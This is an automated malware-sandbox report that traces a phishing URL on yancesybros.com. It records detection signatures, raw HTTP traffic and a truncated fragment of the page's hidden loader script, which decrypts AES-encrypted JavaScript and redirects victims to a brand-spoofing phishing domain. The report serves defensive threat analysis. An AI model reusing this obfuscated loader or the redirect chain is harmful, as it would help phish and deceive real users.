Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://yancesybros.com/WHF9842BVD.html

Overview

General Information

Sample URL:https://yancesybros.com/WHF9842BVD.html
Analysis ID:1562625
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious URL
HTML page contains hidden javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 1012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2200,i,14020259663435035304,8067086571185924884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yancesybros.com/WHF9842BVD.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://nl.nsiciumbe.com/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://nl.nsiciumbe.com
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://nl.nsiciumbe.com
Source: https://yancesybros.com/WHF9842BVD.html?__cf_chl_rt_tk=Dveq2bajeb4.68juqKcEwLAC3uO_Xxj5VhibRkg9Lpo-1732560228-1.0.1.1-EQcS5msdFBnN_w.DEowher7hBFNGCCOYXT25SAX1UmYHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://choicesff.com/res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-morayHTTP Parser: var vynfcwtsuqmepwwj = document.createelement("script");vynfcwtsuqmepwwj.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(vynfcwtsuqmepwwj);vynfcwtsuqmepwwj.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoinfldbuu5k0ppwjbbcmzvekpmd0ppnflvzg42a1c3stu2dulsbfj1rvjsnk8rdhzjaktgskluofdyalvmetlnum9zejntq0nsazr6cu04k3dtwkpkt04rmfjreujgyk9uoesxam13tvpqyuvsstzsz3nuztfdc3fvm1fmnwhyu0vsvmrfzstsze85owsrujnku3uzsfryd2lodmlzvdhhredna1duugnrc2xmvdl4ugl6xc81ymjkn3bmtnjzugu4n2nmoejgn2vhzmjcckxdafruaxezafr5dk45uflobufkcwxsqjy2m201bxurohlynhzswjnpa3zxrehwsk5tb2tvrjrkvjqwy3zybuxioxjcc1a0t3p2zhvpztrkejfqdgzmq2nubkvzodlqu3lqtxjxqunzm2dsbmvkmlbuy1zlb0ncl25hvlb0cwy1c3vvae9ss1boynuxttv0sljcutlmafa3k2hxm0w5yutzq0l1rui1oxi3m0tlz2jrodbtru82rznmbmpjmmircwu1qk15xc9cl2ptufrcl0u2s2zymjbpbwplsja2nst2wm9wq0vvyvvyauxmykvzqtdwwnpsuwl4tgnmwkfzwfhvefizz2lkuzdrnzflvujjn0zuvdzlblhydgpbk09acjlhxc9jemf5sdnty01uawluvdzmmevtawhmr2vbdk9jrwdclzzragjwoedadnhxrfm5xc9kbh...
Source: https://yancesybros.com/WHF9842BVD.html?__cf_chl_rt_tk=Dveq2bajeb4.68juqKcEwLAC3uO_Xxj5VhibRkg9Lpo-1732560228-1.0.1.1-EQcS5msdFBnN_w.DEowher7hBFNGCCOYXT25SAX1UmYHTTP Parser: No favicon
Source: https://yancesybros.com/WHF9842BVD.htmlHTTP Parser: No favicon
Source: https://yancesybros.com/WHF9842BVD.htmlHTTP Parser: No favicon
Source: https://yancesybros.com/WHF9842BVD.htmlHTTP Parser: No favicon
Source: https://nl.nsiciumbe.com/aXqrQHt/HTTP Parser: No favicon
Source: https://nl.nsiciumbe.com/aXqrQHt/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.210
Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.210
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: global trafficHTTP traffic detected: GET /WHF9842BVD.html HTTP/1.1Host: yancesybros.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WHF9842BVD.html HTTP/1.1Host: yancesybros.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8e83c9569b4eefa7 HTTP/1.1Host: yancesybros.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yancesybros.com/WHF9842BVD.html?__cf_chl_rt_tk=Dveq2bajeb4.68juqKcEwLAC3uO_Xxj5VhibRkg9Lpo-1732560228-1.0.1.1-EQcS5msdFBnN_w.DEowher7hBFNGCCOYXT25SAX1UmYAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: yancesybros.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yancesybros.com/WHF9842BVD.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e4025c85ea63/api.js?onload=iQmfw1&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yancesybros.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8e83c9569b4eefa7 HTTP/1.1Host: yancesybros.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e4025c85ea63/api.js?onload=iQmfw1&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz HTTP/1.1Host: yancesybros.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e83c97ff9621a48&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e83c97ff9621a48&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8e83c97ff9621a48/1732560240060/ec9946d522a774066924225e9979f9a285d0363b428f53c5859ec557411cd08f/gqZRZaI8vUHtMGS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pTKuk7a711u7zdz&MD=9dooWE6s HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8e83c97ff9621a48/1732560240060/F7F6o63uyBc_7o8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8e83c97ff9621a48/1732560240060/F7F6o63uyBc_7o8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz HTTP/1.1Host: yancesybros.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-moray HTTP/1.1Host: choicesff.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yancesybros.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: yancesybros.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=BykMC4YVH19jXVBD1vZm_9dQq__54HBoZInYarys1tM-1732560228-1.2.1.1-SFtIe0bMWScEvSPqnkxQ9E8TfXhK1qVPtqTCFRD7UKzmNiXsi6b7zwASMAfKIyJJzNrV2eKhtFw0WkBBGpnA6kpowXeCGzifYCUBGUO1BLeVeipwColDmbh_x83xSRMnpWErKrRqP.QtunH5HTfp_GPZQCmI2ypHTAqmSimygPgztnyf_VCKTT4LzeeM9wmWDiRuzkKS9Up0uKXyaxdl45QIn9wGxexqWGaW1LdpCDfURSY6y6n1AHu_DjerAtiEtA1ivgH.qZACFjMMf6CbN7qYGdX8JRGEhHFenSnNxJR6KcSyqSSUKf6F2_zXZvrDIbNF_mJVWeg.iv7Jid4jtzoHeZpVDUqz4sS2W_n6gxG4PLZvkLM.Z3dbEfxD2kBvmbtJPIgiDjzdQ8L2zO_tTA6HkV3bRdJpz8jeL2vopAHjxm3oevaGarg_rMzwsTLs
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yancesybros.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /res444.php?2-68747470733a2f2f4e4c2e6e73696369756d62652e636f6d2f615871725148742f-moray HTTP/1.1Host: choicesff.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
